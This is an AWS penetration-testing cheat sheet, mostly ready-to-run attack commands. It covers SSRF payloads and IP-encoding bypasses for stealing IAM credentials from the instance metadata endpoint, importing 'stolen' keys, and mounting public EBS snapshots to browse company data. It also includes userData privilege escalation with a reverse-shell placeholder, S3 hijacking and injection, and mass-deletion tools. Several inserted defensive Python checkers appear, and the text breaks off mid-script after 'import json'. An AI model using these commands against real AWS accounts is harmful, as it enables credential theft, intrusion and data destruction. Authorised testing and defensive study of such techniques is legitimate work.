Pentest Book
AWS

AWS basic info

```
Auth methods:
  • Programmatic access - Access Key + Secret Key
    ◇ Secret Access Key and Access Key ID for authenticating via scripts and the CLI
  • Management Console access
    ◇ Web portal access to AWS

Recon:
  • AWS usage
    ◇ Some web applications pull content directly from S3 buckets
    ◇ Look at where web resources are loaded from to determine whether S3 buckets are in use
    ◇ Burp Suite
    ◇ Navigate the application as you normally would, then check for any requests to:
      ▪ https://[bucketname].s3.amazonaws.com
      ▪ https://s3-[region].amazonaws.com/[OrgName]

S3:
  • Amazon Simple Storage Service (S3)
    ◇ Storage service that is "secure by default"
    ◇ Configuration issues tend to unsecure buckets by making them publicly accessible
    ◇ nslookup can help reveal the region
    ◇ S3 URL format:
      ▪ https://[bucketname].s3.amazonaws.com
      ▪ https://s3-[region].amazonaws.com/[Org Name]
# aws s3 ls s3://bucket-name-here --region <region>
# aws s3api get-bucket-acl --bucket bucket-name-here
# aws s3 cp readme.txt s3://bucket-name-here --profile newuserprofile

EBS Volumes:
  • Elastic Block Store (EBS)
  • AWS virtual hard disks
  • Can have issues similar to S3, i.e. snapshots being publicly available
  • Difficult to target a specific org, but widespread leaks can be found

EC2:
  • Like virtual machines
  • SSH keys are created when an instance is started; RDP for Windows
  • Security groups handle open ports and allowed IPs

AWS Instance Metadata URL
  • Cloud servers hosted on services like EC2 needed a way to orient themselves because of how dynamic they are
  • A "metadata" endpoint was created and hosted on the non-routable IP address 169.254.169.254
  • Can contain AWS access/secret keys and IAM credentials
  • This should only be reachable from the instance itself (localhost)
  • Server compromise or SSRF vulnerabilities might allow remote attackers to reach it
  • IAM credentials can be stored here:
    ◇ http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Can potentially be hit externally if a proxy service (like Nginx) is hosted in AWS:
    ◇ curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo
  • CapitalOne hack
    ◇ The attacker exploited SSRF on an EC2 server and accessed the metadata URL to get IAM access keys, then used those keys to dump an S3 bucket containing 100 million individuals' data.
  • AWS EC2 Instance Metadata Service Version 2 (IMDSv2)
    ◇ Updated in November 2019; both v1 and v2 are available
    ◇ Meant to defend the metadata service against SSRF and reverse-proxy vulns
    ◇ Added session auth to requests
    ◇ First, a PUT request is sent and answered with a token
    ◇ Then that token can be used to query data
--
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
curl http://example.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role
--

Post-compromise
  • What do our access keys give us access to?
  • Check the AIO tools to do some recon (WeirdAAL recon_module, Pacu privesc, ...)

http://169.254.169.254/latest/meta-data
http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM Role Name>

# AWS Nuke - remove all AWS resources from our account
# https://github.com/rebuy-de/aws-nuke
- Fill nuke-config.yml with the output of aws sts get-caller-identity
./aws-nuke -c nuke-config.yml # Dry run: shows what would be removed
- If it fails because no account alias exists, create one:
aws iam create-account-alias --account-alias unique-name
./aws-nuke -c nuke-config.yml --no-dry-run # Performs the delete operations

# Cloud Nuke
# https://github.com/gruntwork-io/cloud-nuke
cloud-nuke aws

# Other bypasses
1. EKS:
aws eks list-clusters | jq -rc '.clusters'
["example"]
aws eks update-kubeconfig --name example
kubectl get secrets

2. SSRF AWS bypasses to reach the metadata endpoint (alternative encodings of 169.254.169.254):
Converted decimal IP: http://2852039166/latest/meta-data/
IPv6 compressed:      http://[::ffff:a9fe:a9fe]/latest/meta-data/
IPv6 expanded:        http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/

# Interesting instance metadata URLs:
http://instance-data
http://169.254.169.254
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
```
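The SSRF bypasses above work because a naive deny-list compares the literal string "169.254.169.254" while the decimal and IPv4-mapped IPv6 forms slip past it. The guard below, an added example that is not part of the original page, canonicalises the host of an outbound URL before checking it; the hostname deny-list and the IPv6 IMDS address are assumptions for the example, and hex/decimal integer hosts are handled as a generalisation of the page's decimal case.

```python
import ipaddress
from urllib.parse import urlsplit

# Addresses a server-side fetcher must never reach: the link-local IMDS
# address from the page and AWS's IPv6 IMDS endpoint (assumed here).
IMDS_V4 = ipaddress.ip_address("169.254.169.254")
IMDS_V6 = ipaddress.ip_address("fd00:ec2::254")
# Hostname aliases for the metadata service (the first is listed on the page).
BLOCKED_HOSTNAMES = {"instance-data", "instance-data.ec2.internal"}


def canonical_host(host: str):
    """Return an ip_address for any numeric host form, or None for a DNS name.

    Handles the forms the page lists (dotted quad, decimal integer,
    compressed and expanded IPv4-mapped IPv6) plus 0x-prefixed hex.
    """
    host = host.strip("[]")
    try:
        if host.isdigit():                       # e.g. 2852039166
            return ipaddress.ip_address(int(host))
        if host.lower().startswith("0x"):        # e.g. 0xa9fea9fe
            return ipaddress.ip_address(int(host, 16))
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None                              # not an IP literal at all
    # ::ffff:a9fe:a9fe is 169.254.169.254 in disguise; unwrap it so a single
    # IPv4 comparison covers both spellings.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        return addr.ipv4_mapped
    return addr


def is_metadata_target(url: str) -> bool:
    """True when the URL points at the instance metadata service (or any
    link-local address), regardless of how the host is encoded."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    if host.lower() in BLOCKED_HOSTNAMES:
        return True
    addr = canonical_host(host)
    if addr is None:
        return False                             # DNS names need a resolver check too
    if addr in (IMDS_V4, IMDS_V6):
        return True
    return addr.is_link_local


if __name__ == "__main__":
    for u in ("http://169.254.169.254/latest/meta-data/",
              "http://2852039166/latest/meta-data/",
              "http://[::ffff:a9fe:a9fe]/latest/meta-data/",
              "http://example.com/?url=x"):
        print(f"{'BLOCK' if is_metadata_target(u) else 'allow'}  {u}")
```

A DNS name that resolves to the metadata address is not caught by string checks; resolve first and run the resolved address through canonical_host as well.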

Find AWS in domain/company

```
# Find subdomains
./sub.sh -s example.com
assetfinder example.com
## Bruteforcing
python3 dnsrecon.py -d example.com -D subdomains-top1mil-5000.txt -t brt

# Reverse DNS lookups
host subdomain.domain.com
host IP

# Bucket finders
python3 cloud_enum.py -k example.com
ruby lazys3.rb companyname
# https://github.com/bbb31/slurp
slurp domain -t example.com
```

AIO AWS tools

```
# https://github.com/carnal0wnage/weirdAAL
pip3 install -r requirements.txt
cp env.sample .env
vim .env
python3 weirdAAL.py -l

# https://github.com/RhinoSecurityLabs/pacu
bash install.sh
python3 pacu.py
import_keys --all
ls

# https://github.com/dagrz/aws_pwn
# Lots of scripts for different purposes, check the GitHub repo

# IAM resources finder
# https://github.com/BishopFox/smogcloud
smogcloud

# Red team scripts for AWS
# https://github.com/elitest/Redboto

# AWS Bloodhound
# https://github.com/lyft/cartography

# AWS Exploitation Framework
# https://github.com/grines/scour
```

S3

Basic Commands

```
aws s3 ls s3://
aws s3api list-buckets
aws s3 ls s3://bucket.com
aws s3 ls --recursive s3://bucket.com
aws s3 sync s3://bucketname s3-files-dir
aws s3 cp s3://bucket-name/<file> <destination>
aws s3 cp test-file.txt s3://bucket-name   # or: aws s3 mv test-file.txt s3://bucket-name
aws s3 rm s3://bucket-name/test-file.txt
aws s3api get-bucket-acl --bucket bucket-name # Check owner and grants
aws s3api head-object --bucket bucket-name --key file.txt # Check file metadata
```

Find S3 buckets

```
# Find buckets from a keyword or company name
# https://github.com/nahamsec/lazys3
ruby lazys3.rb companyname

# https://github.com/initstring/cloud_enum
python3 cloud_enum.py -k companynameorkeyword

# https://github.com/gwen001/s3-buckets-finder
php s3-buckets-bruteforcer.php --bucket gwen001-test002

# Public S3 buckets
https://buckets.grayhatwarfare.com
https://github.com/eth0izzle/bucket-stream

# https://github.com/cr0hn/festin
festin mydomain.com
festin -f domains.txt

# Google dork
site:.s3.amazonaws.com "Company"
```

Check S3 buckets perms and files

```
# https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets
alias flumberbuckets='sudo python3 PATH/flumberboozle/flumberbuckets/flumberbuckets.py -p'
echo "bucket" | flumberbuckets -si -
cat hosts.txt | flumberbuckets -si -

# https://github.com/sa7mon/S3Scanner
sudo python3 s3scanner.py sites.txt
sudo python ./s3scanner.py --include-closed --out-file found.txt --dump names.txt

# https://github.com/clario-tech/s3-inspector
python s3inspector.py

# https://github.com/jordanpotti/AWSBucketDump
source /home/cloudhacker/tools/AWSBucketDump/bin/activate
touch s.txt
sed -i "s,$,-$bapname-awscloudsec,g" /home/cloudhacker/tools/AWSBucketDump/BucketNames.txt
python AWSBucketDump.py -D -l BucketNames.txt -g s.txt

# https://github.com/Ucnt/aws-s3-data-finder/
python3 find_data.py -n bucketname -u

# https://github.com/VirtueSecurity/aws-extender-cli
python3 aws_extender_cli.py -s S3 -b flaws.cloud
```

S3 examples attacks

```
# S3 Bucket Pillaging

  • GOAL: Locate Amazon S3 buckets and search them for interesting data
  • In this lab you will attempt to identify a publicly accessible S3 bucket hosted by an organization. After identifying it you will list its contents and download the files hosted there.

~$ sudo apt-get install python3-pip
~$ git clone https://github.com/RhinoSecurityLabs/pacu
~$ cd pacu
~$ sudo bash install.sh
~$ sudo aws configure
~$ sudo python3 pacu.py

Pacu > import_keys --all
# Search by domain
Pacu > run s3__bucket_finder -d glitchcloud
# List files in the bucket
Pacu > aws s3 ls s3://glitchcloud
# Download files
Pacu > aws s3 sync s3://glitchcloud s3-files-dir

# S3 Code Injection
  • Backdoored JavaScript in S3 buckets used by webapps
  • In March 2018 a crypto-miner was found loading on MSN's homepage
  • This was due to AOL's advertising platform having a writeable S3 bucket whose content was served by MSN
  • If a webapp loads content from an S3 bucket that is publicly writeable, attackers can upload malicious JS that gets executed by visitors
  • Can perform XSS-type attacks against webapp visitors
  • Hook browsers with BeEF

# Domain Hijacking
  • Hijack an S3 domain by finding references in a webapp to S3 buckets that no longer exist
  • Or... subdomains that were linked to an S3 bucket with CNAMEs that still exist
  • When assessing webapps, look for 404s to *.s3.amazonaws.com
  • When brute forcing subdomains for an org, look for 404s with the 'NoSuchBucket' error
  • Go create the S3 bucket with the same name and region
  • Load malicious content into the new S3 bucket that will be executed when visitors hit the site
```
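Both the `get-bucket-acl` command in the basic commands above and the writeable-bucket case in the S3 code injection notes come down to one question: which grants in the ACL go to the two global groups (AllUsers, AuthenticatedUsers)? The checker below is an added example, not code from the page; it parses `aws s3api get-bucket-acl` output and the sample ACL is constructed.

```python
import json

# Grantee URIs that open a bucket to everyone / to any AWS account.
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "anonymous",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "any AWS account",
}
# READ on a bucket lets anyone list it; WRITE lets them upload (the code
# injection case); WRITE_ACP lets them rewrite the ACL itself.
READ_PERMS = {"READ", "FULL_CONTROL"}
WRITE_PERMS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}


def public_grants(acl: dict) -> list:
    """Return (audience, permission) for every grant to a public group.

    `acl` is the parsed JSON printed by `aws s3api get-bucket-acl`.
    """
    found = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue                      # CanonicalUser grants are account-scoped
        audience = PUBLIC_GROUPS.get(grantee.get("URI"))
        if audience:
            found.append((audience, grant["Permission"]))
    return found


def summarize_acl(acl_text: str) -> dict:
    """Owner plus a public-read / public-write verdict for one bucket ACL."""
    acl = json.loads(acl_text)
    owner = acl.get("Owner", {})
    grants = public_grants(acl)
    return {
        "owner": owner.get("DisplayName") or owner.get("ID"),
        "public_read": any(p in READ_PERMS for _, p in grants),
        "public_write": any(p in WRITE_PERMS for _, p in grants),
        "grants": grants,
    }


# Constructed sample shaped like get-bucket-acl output: listable by anyone
# and writeable by any authenticated AWS account.
SAMPLE_ACL = """{
  "Owner": {"DisplayName": "example-owner", "ID": "0123456789abcdef0123456789abcdef"},
  "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "0123456789abcdef0123456789abcdef"},
     "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
     "Permission": "WRITE"}
  ]
}"""

if __name__ == "__main__":
    print(json.dumps(summarize_acl(SAMPLE_ACL), indent=2))
```

Bucket policies and Block Public Access settings can grant or override what the ACL says, so treat this as one of the checks, not the only one.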

Enumerate read access buckets script

```
#!/bin/bash
# Usage: ./readbuckets.sh --profile <aws-profile>
# Pulls the profile name out of the arguments; the aws CLI reads the matching
# keys from the credentials file itself via --profile.
for i in "$@" ; do
  if [[ $i == "--profile" ]] ; then
    profile=$(echo "$@" | awk '{for(i=1;i<=NF;i++) if ($i=="--profile") print $(i+1)}')
    AWS_ACCESS_KEY_ID=$(grep -i "$profile" -A 2 /root/.aws/credentials | grep -i = | cut -d " " -f 3 | head -n 1)
    AWS_SECRET_ACCESS_KEY=$(grep -i "$profile" -A 2 /root/.aws/credentials | grep -i = | cut -d " " -f 3 | tail -n 1)
    break
  fi
done
if [ -z "$profile" ]; then
  echo "usage: $0 --profile <aws-profile>" >&2
  exit 1
fi
echo "Enumerating the buckets..."
# `aws s3 ls` prints "<date> <time> <bucket>"; field 3 is the bucket name
aws --profile "$profile" s3 ls | cut -d ' ' -f 3 > /tmp/buckets
echo "You can read the following buckets:"
>/tmp/readBuckets
for i in $(cat /tmp/buckets); do
  result=$(aws --profile "$profile" s3 ls s3://"$i" 2>/dev/null | head -n 1)
  if [ ! -z "$result" ]; then
    echo "$i" | tee -a /tmp/readBuckets   # -a appends, so every readable bucket is kept
    unset result
  fi
done
```

IAM

Basic commands

```
# ~/.aws/credentials
[default]
aws_access_key_id = XXX
aws_secret_access_key = XXXX

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_DEFAULT_REGION=

# Check the credentials are valid
aws sts get-caller-identity
aws sdb list-domains --region us-east-1

# If we can steal AWS credentials, add them to your configuration
aws configure --profile stolen
# Open ~/.aws/credentials
# Under the [stolen] section add aws_session_token with the discovered token value
aws sts get-caller-identity --profile stolen

# Get account id
aws sts get-access-key-info --access-key-id=ASIA1234567890123456

aws iam get-account-password-policy
aws sts get-session-token
aws iam list-users
aws iam list-roles
aws iam list-access-keys --user-name <username>
aws iam create-access-key --user-name <username>
aws iam list-attached-user-policies --user-name XXXX
aws iam get-policy
aws iam get-policy-version

aws deploy list-applications

aws directconnect describe-connections

aws secretsmanager get-secret-value --secret-id <value> --profile <container tokens>

aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa

# IAM identifier prefix meaning
ABIA - AWS STS service bearer token
ACCA - Context-specific credential
AGPA - Group
AIDA - IAM user
AIPA - Amazon EC2 instance profile
AKIA - Access key
ANPA - Managed policy
ANVA - Version in a managed policy
APKA - Public key
AROA - Role
ASCA - Certificate
ASIA - Temporary (AWS STS) access key ID; only unique in combination with the secret access key and the session token
```

Tools

```
# https://github.com/andresriancho/enumerate-iam
python enumerate-iam.py --access-key XXXXXXXXXXXXX --secret-key XXXXXXXXXXX
python enumerate-iam.py --access-key "ACCESSKEY" --secret-key "SECRETKEY" (--session-token "$AWS_SESSION_TOKEN")

# https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
python aws_escalate.py

# https://github.com/andresriancho/nimbostratus
python2 nimbostratus dump-permissions

# https://github.com/nccgroup/ScoutSuite
python3 scout.py aws

# https://github.com/salesforce/cloudsplaining
cloudsplaining download
cloudsplaining scan

# Enumerate IAM permissions without logging (stealth mode)
# https://github.com/Frichetten/aws_stealth_perm_enum

# Unauthenticated (only the account id is needed) enumeration of IAM users and roles
# https://github.com/Frichetten/enumate_iam_using_bucket_policy

# AWS Consoler
# https://github.com/NetSPI/aws_consoler
# Generate a console link from valid credentials
aws_consoler -a ASIAXXXX -s SECRETXXXX -t TOKENXXXX

# AWSRoleJuggler
# https://github.com/hotnops/AWSRoleJuggler/
# You can use one assumed role to assume another one
./find_circular_trust.py
python aws_role_juggler.py -r arn:aws:iam::123456789:role/BuildRole arn:aws:iam::123456789:role/GitRole arn:aws:iam::123456789:role/ArtiRole

# https://github.com/prisma-cloud/IAMFinder
python3 iamfinder.py init
python3 iamfinder.py enum_user --aws_id 123456789012

# https://github.com/nccgroup/PMapper
# Check IAM permissions
```

AWS IAM Cli Enumeration

```
# First of all, set your profile
aws configure --profile test
profile=test # Just for convenience

# Get the policies available
aws --profile "$profile" iam list-policies | jq -r ".Policies[].Arn"
# Get a specific policy's default version id ($i holds a policy ARN from the list above)
aws --profile "$profile" iam get-policy --policy-arn "$i" --query "Policy.DefaultVersionId" --output text
# Get all the juicy info in one go (then search the output for Action/Resource */*)
profile="test"; for i in $(aws --profile "$profile" iam list-policies | jq -r '.Policies[].Arn'); do echo "Describing policy $i" && aws --profile "$profile" iam get-policy-version --policy-arn "$i" --version-id $(aws --profile "$profile" iam get-policy --policy-arn "$i" --query 'Policy.DefaultVersionId' --output text); done | tee /tmp/policies.log

# List managed user policies
aws --profile "test" iam list-attached-user-policies --user-name "test-user"
# List managed group policies
aws --profile "test" iam list-attached-group-policies --group-name "test-group"
# List managed role policies
aws --profile "test" iam list-attached-role-policies --role-name "test-role"

# List inline user policies
aws --profile "test" iam list-user-policies --user-name "test-user"
# List inline group policies
aws --profile "test" iam list-group-policies --group-name "test-group"
# List inline role policies
aws --profile "test" iam list-role-policies --role-name "test-role"

# Describe inline user policies
aws --profile "test" iam get-user-policy --user-name "test-user" --policy-name "test-policy"
# Describe inline group policies
aws --profile "test" iam get-group-policy --group-name "test-group" --policy-name "test-policy"
# Describe inline role policies
aws --profile "test" iam get-role-policy --role-name "test-role" --policy-name "test-policy"

# Get a role (including its trust policy)
aws --profile "test" iam get-role --role-name "test-role"

# Assume a role from any EC2 instance (get Admin)
# Create an instance profile
aws iam create-instance-profile --instance-profile-name YourNewRole-Instance-Profile
# Associate the role with the instance profile
aws iam add-role-to-instance-profile --role-name YourNewRole --instance-profile-name YourNewRole-Instance-Profile
# Associate the instance profile with the instance you want to use
aws ec2 associate-iam-instance-profile --instance-id YourInstanceId --iam-instance-profile Name=YourNewRole-Instance-Profile

# Get the assumed role in the instance
aws --profile test sts get-caller-identity

# Shadow admin
aws iam list-attached-user-policies --user-name {}
aws iam get-policy-version --policy-arn provide_policy_arn --version-id $(aws iam get-policy --policy-arn provide_policy_arn --query 'Policy.DefaultVersionId' --output text)
aws iam list-user-policies --user-name {}
aws iam get-user-policy --policy-name policy_name_from_above_command --user-name {} | python -m json.tool
# Vulnerable policies (actions that let a user escalate):
iam:CreateUser
iam:CreateLoginProfile
iam:UpdateLoginProfile
iam:AddUserToGroup
```
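Reading `/tmp/policies.log` by eye for `*`/`*` and for the four "shadow admin" actions above does not scale past a handful of policies. The analyser below is an added example (not code from the page): it takes the `Document` object from `get-policy-version` or `get-user-policy` output and flags Allow statements that are full admin, that use NotAction, or whose action patterns (including wildcards such as `iam:Create*`) cover one of the listed escalation actions. The sample policy is constructed.

```python
import fnmatch

# The actions the page lists under "Vulnerable policies", lower-cased because
# IAM action matching is case-insensitive.
ESCALATION_ACTIONS = (
    "iam:addusertogroup",
    "iam:createloginprofile",
    "iam:createuser",
    "iam:updateloginprofile",
)


def _as_list(value):
    """IAM allows a string or a list in Statement/Action/Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def allows(pattern: str, action: str) -> bool:
    """Does an IAM action pattern (with * / ? wildcards) cover `action`?"""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def risky_statements(policy: dict) -> list:
    """Findings for Allow statements that are admin-equivalent or escalation-capable.

    Each finding records the statement index, the reason and whether the
    statement applies to Resource "*"; scoped statements are still reported
    so the reviewer can judge the resource themselves.
    """
    findings = []
    for idx, st in enumerate(_as_list(policy.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue                                    # Deny never escalates
        all_resources = "*" in _as_list(st.get("Resource"))
        if "NotAction" in st:
            # Allow + NotAction grants everything except what is listed.
            findings.append({"statement": idx, "reason": "Allow with NotAction",
                             "all_resources": all_resources})
            continue
        actions = _as_list(st.get("Action"))
        if "*" in actions and all_resources:
            findings.append({"statement": idx, "reason": "full admin (*/*)",
                             "all_resources": True})
            continue
        for esc in ESCALATION_ACTIONS:
            hit = next((a for a in actions if allows(a, esc)), None)
            if hit:
                findings.append({"statement": idx, "reason": f"{hit} covers {esc}",
                                 "all_resources": all_resources})
    return findings


# Constructed sample: a harmless S3 read, a wildcard IAM grant that quietly
# covers CreateUser and CreateLoginProfile, a self-scoped password change
# and an explicit Deny.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Effect": "Allow", "Action": "iam:Create*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["iam:ChangePassword"],
         "Resource": "arn:aws:iam::123456789012:user/alice"},
        {"Effect": "Deny", "Action": "*", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for f in risky_statements(SAMPLE_POLICY):
        print(f)
```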

EBS

Find secrets in public EBS

```
# Dufflebag https://github.com/bishopfox/dufflebag
```

EBS attack example

```
# Discover an EBS snapshot and mount it to browse it
- Obtaining the public snapshot name
aws ec2 describe-snapshots --region us-east-1 --restorable-by-user-ids all | grep -C 10 "company secrets"
- Obtaining the zone and instance
aws ec2 describe-instances --filters Name=tag:Name,Values=attacker-machine
- Create a new volume from it
aws ec2 create-volume --snapshot-id snap-03616657ede4b9862 --availability-zone <ZONE-HERE>
- Attach it to an EC2 instance
aws ec2 attach-volume --device /dev/sdh --instance-id <INSTANCE-ID> --volume-id <VOLUME-ID>
- It takes some time; to see the status:
aws ec2 describe-volumes --filters Name=volume-id,Values=<VOLUME-ID>
- Once it is attached to the EC2 instance, check it, mount it and access it:
sudo lsblk
sudo mount /dev/xvdh1 /mnt
cd /mnt/home/user/companydata
```
```
# WeirdAAL https://github.com/carnal0wnage/weirdAAL
```

EC2

EC2 basic commands

```
# Like a traditional host
- Port enumeration
- Attack interesting services like ssh or rdp

aws ec2 describe-instances
aws ssm describe-instance-information
aws ec2 describe-snapshots
aws ec2 describe-security-groups --group-ids <VPC Security Group ID> --region <region>
aws ec2 create-volume --snapshot-id snap-123123123
aws ec2 describe-snapshots --owner-ids {user-id}

# SSH into the created instance:
ssh -i ".ssh/key.pem" <user>@<instance-ip>
sudo mount /dev/xvdb1 /mnt
cat /mnt/home/ubuntu/setupNginx.sh

# EC2 security groups
aws ec2 describe-security-groups
# Groups with an ingress rule open to the whole internet
aws ec2 describe-security-groups --filters Name=ip-permission.cidr,Values='0.0.0.0/0' --query "SecurityGroups[*].[GroupName]" --output text
```
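The `0.0.0.0/0` filter above tells you which groups have a world-open rule but not which ports that rule exposes; a `-1` (all traffic) rule or a wide port range covers ssh, rdp and the RDS port without naming them. The audit below is an added example, not code from the page: it parses `aws ec2 describe-security-groups` output and reports the sensitive ports (those the page's notes single out) reachable from anywhere; the sample groups are constructed.

```python
import json

# Services the page's notes call out: ssh, rdp and the RDS MySQL port.
SENSITIVE_PORTS = {22: "ssh", 3389: "rdp", 3306: "mysql"}
ANYWHERE = {"0.0.0.0/0", "::/0"}


def _rule_covers(rule: dict, port: int) -> bool:
    """True if one IpPermissions entry includes `port`.

    IpProtocol "-1" means all traffic and carries no port fields; TCP rules
    carry an inclusive FromPort..ToPort range.
    """
    proto = rule.get("IpProtocol")
    if proto == "-1":
        return True
    if proto not in ("tcp", "6"):
        return False
    return rule.get("FromPort", 0) <= port <= rule.get("ToPort", 65535)


def _open_to_world(rule: dict) -> bool:
    v4 = {r.get("CidrIp") for r in rule.get("IpRanges", [])}
    v6 = {r.get("CidrIpv6") for r in rule.get("Ipv6Ranges", [])}
    return bool((v4 | v6) & ANYWHERE)


def world_exposed_ports(sg_json: str) -> list:
    """Return sorted (GroupId, port, service) triples for sensitive ports
    that any address on the internet may reach."""
    findings = set()
    for sg in json.loads(sg_json).get("SecurityGroups", []):
        for rule in sg.get("IpPermissions", []):
            if not _open_to_world(rule):
                continue
            for port, svc in SENSITIVE_PORTS.items():
                if _rule_covers(rule, port):
                    findings.add((sg["GroupId"], port, svc))
    return sorted(findings)


# Constructed sample: a web group that also opens ssh, a database group
# restricted to a private range, and an "allow everything" group.
SAMPLE_SECURITY_GROUPS = """{
  "SecurityGroups": [
    {"GroupId": "sg-0aaaaaaaaaaaaaaaa", "GroupName": "web",
     "IpPermissions": [
       {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
       {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}
     ]},
    {"GroupId": "sg-0bbbbbbbbbbbbbbbb", "GroupName": "db",
     "IpPermissions": [
       {"IpProtocol": "tcp", "FromPort": 3306, "ToPort": 3306, "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": []}
     ]},
    {"GroupId": "sg-0ccccccccccccccccc", "GroupName": "wide-open",
     "IpPermissions": [
       {"IpProtocol": "-1", "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}
     ]}
  ]
}"""

if __name__ == "__main__":
    for group, port, svc in world_exposed_ports(SAMPLE_SECURITY_GROUPS):
        print(f"{group}: {svc} ({port}) open to the world")
```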

EC2 example attacks

```
# SSRF to http://169.254.169.254 (metadata server)
curl http://<ec2-ip-address>/\?url\=http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/public-hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/
http://169.254.169.254/latest/meta-data/local-ipv4
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key/
http://169.254.169.254/latest/user-data

# Find IAM security credentials
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Using the EC2 instance metadata tool
ec2-metadata -h
# With EC2 Instance Metadata Service version 2 (IMDSv2):
# Add the X-aws-ec2-metadata-token header, carrying a token obtained with a PUT request to http://169.254.169.254/latest/api/token

# Check directly for the metadata instance
curl -s http://<ec2-ip-address>/latest/meta-data/ -H 'Host:169.254.169.254'

# EC2 instance connect
aws ec2 describe-instances | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE_WE_GOT_PREVIOUSLY --availability-zone zone --instance-os-user ubuntu --ssh-public-key file://shortkey.pub

# EC2 AMI - read an instance, create an AMI from it and run it
aws ec2 describe-images --region specific-region
aws ec2 create-image --instance-id ID --name "EXPLOIT" --description "Export AMI" --region specific-region
aws ec2 import-key-pair --key-name "EXPLOIT" --public-key-material fileb:///publickeyfile
aws ec2 describe-images --filters "Name=name,Values=EXPLOIT"
aws ec2 run-instances --image-id {} --security-group-ids "" --subnet-id {} --count 1 --instance-type t2.micro --key-name EXPLOIT

# Create a volume from a snapshot, attach it to an instance and mount it locally
aws ec2 create-volume --snapshot-id snapshot_id --availability-zone zone
aws ec2 attach-volume --volume-id above-volume-id --instance-id instance-id --device /dev/sdf

# Privesc with modify-instance-attribute
aws ec2 modify-instance-attribute --instance-id=xxx --attribute userData --value file://file.b64.txt
# file.b64.txt is produced with: base64 file.txt > file.b64.txt
# file.txt contains:
```
```
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
**commands here** (reverse shell, set ssh keys...)
--//
```
```
# Privesc 2 with user data
# On first launch, the EC2 instance pulls start_script from S3 and runs it. If an adversary can write to that location, they can escalate privileges or gain control of the EC2 instance.
#!/bin/bash
aws s3 cp s3://example-boot-bucket/start_script.sh /root/start_script.sh
chmod +x /root/start_script.sh
/root/start_script.sh
```
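Every SSRF-to-metadata trick above depends on the instance still answering unauthenticated IMDSv1 requests; an instance with `HttpTokens` set to `required` only serves the token-based IMDSv2 flow. The audit below is an added example (not code from the page): it parses `aws ec2 describe-instances` output and lists instances where IMDSv1 is still reachable, putting role-bearing instances first since those are the ones whose credentials would leak. The sample output is constructed.

```python
import json


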